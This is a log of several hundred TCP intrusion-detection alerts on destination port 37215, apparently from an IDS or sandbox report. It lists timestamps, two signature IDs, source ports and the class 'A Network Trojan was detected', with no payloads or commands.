                  Timestamp:07/10/24-08:26:11.562068
                  SID:2835222
                  Source Port:45118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.461581
                  SID:2829579
                  Source Port:42856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.857818
                  SID:2829579
                  Source Port:47736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.126457
                  SID:2835222
                  Source Port:43174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.903718
                  SID:2829579
                  Source Port:55428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.596939
                  SID:2835222
                  Source Port:52908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.811251
                  SID:2829579
                  Source Port:41992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.508091
                  SID:2835222
                  Source Port:38076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751159
                  SID:2835222
                  Source Port:41236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.160309
                  SID:2829579
                  Source Port:41416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.395852
                  SID:2835222
                  Source Port:44076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739921
                  SID:2829579
                  Source Port:47314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.068125
                  SID:2829579
                  Source Port:59364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.265342
                  SID:2835222
                  Source Port:36864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2829579
                  Source Port:35664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.343268
                  SID:2835222
                  Source Port:45744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.643122
                  SID:2829579
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.352797
                  SID:2829579
                  Source Port:45244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.807421
                  SID:2835222
                  Source Port:37248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.835368
                  SID:2835222
                  Source Port:57152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356650
                  SID:2829579
                  Source Port:46392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.755457
                  SID:2829579
                  Source Port:47850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.523426
                  SID:2829579
                  Source Port:32844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.778513
                  SID:2829579
                  Source Port:52048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.860348
                  SID:2835222
                  Source Port:33140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.165104
                  SID:2835222
                  Source Port:59758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953433
                  SID:2835222
                  Source Port:55746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.853757
                  SID:2835222
                  Source Port:34704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.437179
                  SID:2835222
                  Source Port:48868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2835222
                  Source Port:48698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237467
                  SID:2829579
                  Source Port:51926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.259502
                  SID:2835222
                  Source Port:55244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.812421
                  SID:2835222
                  Source Port:59470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385824
                  SID:2835222
                  Source Port:50226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037759
                  SID:2835222
                  Source Port:48368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.917695
                  SID:2829579
                  Source Port:50152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.015604
                  SID:2829579
                  Source Port:47674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.368181
                  SID:2835222
                  Source Port:54812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.980706
                  SID:2829579
                  Source Port:38052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.412174
                  SID:2835222
                  Source Port:38744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483733
                  SID:2829579
                  Source Port:55954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.877679
                  SID:2829579
                  Source Port:37492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.951146
                  SID:2835222
                  Source Port:39034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848554
                  SID:2829579
                  Source Port:57088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.908493
                  SID:2829579
                  Source Port:42986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.513310
                  SID:2835222
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.520220
                  SID:2829579
                  Source Port:45158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.549149
                  SID:2829579
                  Source Port:54248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.530695
                  SID:2829579
                  Source Port:55228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.595539
                  SID:2835222
                  Source Port:44932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.158539
                  SID:2835222
                  Source Port:46046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.360429
                  SID:2835222
                  Source Port:37992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.051862
                  SID:2829579
                  Source Port:55748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650241
                  SID:2829579
                  Source Port:45834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.550512
                  SID:2835222
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.785606
                  SID:2829579
                  Source Port:53556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.943853
                  SID:2835222
                  Source Port:52824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.531536
                  SID:2829579
                  Source Port:39664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189042
                  SID:2835222
                  Source Port:53968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.290002
                  SID:2829579
                  Source Port:58666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399837
                  SID:2835222
                  Source Port:49472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.125046
                  SID:2835222
                  Source Port:60074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623254
                  SID:2835222
                  Source Port:55002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.921324
                  SID:2835222
                  Source Port:53346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.360120
                  SID:2835222
                  Source Port:58160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.557842
                  SID:2835222
                  Source Port:38522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.179489
                  SID:2835222
                  Source Port:59458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.155413
                  SID:2829579
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.463171
                  SID:2835222
                  Source Port:59552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.893458
                  SID:2829579
                  Source Port:48684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.789175
                  SID:2829579
                  Source Port:42770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.825721
                  SID:2829579
                  Source Port:54272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885642
                  SID:2835222
                  Source Port:43212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.151143
                  SID:2835222
                  Source Port:35018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2835222
                  Source Port:44960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328153
                  SID:2829579
                  Source Port:51238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.835787
                  SID:2829579
                  Source Port:47280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202394
                  SID:2829579
                  Source Port:57808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.618649
                  SID:2829579
                  Source Port:40034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.801759
                  SID:2835222
                  Source Port:59806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.756969
                  SID:2829579
                  Source Port:59170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.748001
                  SID:2829579
                  Source Port:57978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.837652
                  SID:2829579
                  Source Port:53232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.146093
                  SID:2835222
                  Source Port:39616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.863444
                  SID:2835222
                  Source Port:56520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.796387
                  SID:2835222
                  Source Port:46690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478024
                  SID:2829579
                  Source Port:37038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.168710
                  SID:2835222
                  Source Port:43062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.406016
                  SID:2829579
                  Source Port:59180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.836980
                  SID:2829579
                  Source Port:40728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.914738
                  SID:2835222
                  Source Port:42830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.741388
                  SID:2829579
                  Source Port:38982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.837922
                  SID:2835222
                  Source Port:48710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.851044
                  SID:2829579
                  Source Port:51394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822867
                  SID:2835222
                  Source Port:56462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.496138
                  SID:2829579
                  Source Port:39982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.606655
                  SID:2829579
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.209025
                  SID:2835222
                  Source Port:46956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.557053
                  SID:2835222
                  Source Port:52898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.740635
                  SID:2835222
                  Source Port:45018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.765325
                  SID:2829579
                  Source Port:38998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.516215
                  SID:2835222
                  Source Port:34616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.223099
                  SID:2829579
                  Source Port:46156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.748001
                  SID:2829579
                  Source Port:41074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.918305
                  SID:2829579
                  Source Port:50220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.146093
                  SID:2829579
                  Source Port:48380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.479791
                  SID:2829579
                  Source Port:51866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001524
                  SID:2835222
                  Source Port:50292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.877940
                  SID:2835222
                  Source Port:40920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.384643
                  SID:2829579
                  Source Port:43976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.709645
                  SID:2835222
                  Source Port:56140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.662603
                  SID:2835222
                  Source Port:55938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.857207
                  SID:2835222
                  Source Port:44356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2835222
                  Source Port:50412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.302131
                  SID:2835222
                  Source Port:57750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.878157
                  SID:2835222
                  Source Port:55530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.461337
                  SID:2835222
                  Source Port:52334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.925907
                  SID:2835222
                  Source Port:46614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798485
                  SID:2835222
                  Source Port:44058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.891282
                  SID:2835222
                  Source Port:48376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.060125
                  SID:2835222
                  Source Port:45202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.176670
                  SID:2835222
                  Source Port:51112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151315
                  SID:2829579
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.594360
                  SID:2829579
                  Source Port:37726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.465433
                  SID:2835222
                  Source Port:39136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285736
                  SID:2835222
                  Source Port:44420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.312291
                  SID:2835222
                  Source Port:37722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.243243
                  SID:2829579
                  Source Port:40416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.557804
                  SID:2835222
                  Source Port:54614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.540383
                  SID:2829579
                  Source Port:39186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134396
                  SID:2835222
                  Source Port:51134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583861
                  SID:2835222
                  Source Port:47888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.829740
                  SID:2835222
                  Source Port:54330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439575
                  SID:2835222
                  Source Port:54000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.147749
                  SID:2829579
                  Source Port:59704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.337044
                  SID:2835222
                  Source Port:36794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.493980
                  SID:2835222
                  Source Port:35202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595153
                  SID:2835222
                  Source Port:48180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763475
                  SID:2835222
                  Source Port:37010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.580487
                  SID:2835222
                  Source Port:39726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.831148
                  SID:2835222
                  Source Port:33200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.864832
                  SID:2835222
                  Source Port:39194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.239368
                  SID:2835222
                  Source Port:50934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.845095
                  SID:2835222
                  Source Port:40352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151855
                  SID:2829579
                  Source Port:38314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.168197
                  SID:2835222
                  Source Port:38358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.646782
                  SID:2829579
                  Source Port:48666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.317651
                  SID:2835222
                  Source Port:38474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.168081
                  SID:2829579
                  Source Port:46176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2829579
                  Source Port:52702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.647438
                  SID:2829579
                  Source Port:57438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.141072
                  SID:2835222
                  Source Port:33956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.837578
                  SID:2835222
                  Source Port:54752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.486586
                  SID:2835222
                  Source Port:40524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144777
                  SID:2835222
                  Source Port:41576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.819517
                  SID:2829579
                  Source Port:36188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.330913
                  SID:2829579
                  Source Port:48896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.335280
                  SID:2829579
                  Source Port:41460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.810296
                  SID:2835222
                  Source Port:51078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637421
                  SID:2835222
                  Source Port:38246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230856
                  SID:2835222
                  Source Port:55194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.878263
                  SID:2829579
                  Source Port:56798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.427067
                  SID:2835222
                  Source Port:59818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.000608
                  SID:2829579
                  Source Port:58562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.576586
                  SID:2835222
                  Source Port:54420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.838617
                  SID:2835222
                  Source Port:50850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815716
                  SID:2835222
                  Source Port:58342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.196135
                  SID:2829579
                  Source Port:41008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428275
                  SID:2829579
                  Source Port:42082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2835222
                  Source Port:37782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861470
                  SID:2835222
                  Source Port:56766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.856939
                  SID:2829579
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448133
                  SID:2835222
                  Source Port:58774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.784198
                  SID:2829579
                  Source Port:50070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.286838
                  SID:2829579
                  Source Port:32954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753198
                  SID:2829579
                  Source Port:41198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083143
                  SID:2835222
                  Source Port:55396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134234
                  SID:2829579
                  Source Port:34974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.959831
                  SID:2829579
                  Source Port:59796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.565038
                  SID:2835222
                  Source Port:40158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.778189
                  SID:2835222
                  Source Port:37492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2835222
                  Source Port:59132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.908603
                  SID:2829579
                  Source Port:48832
                  Destination Port:37215
                  Protocol:TCP
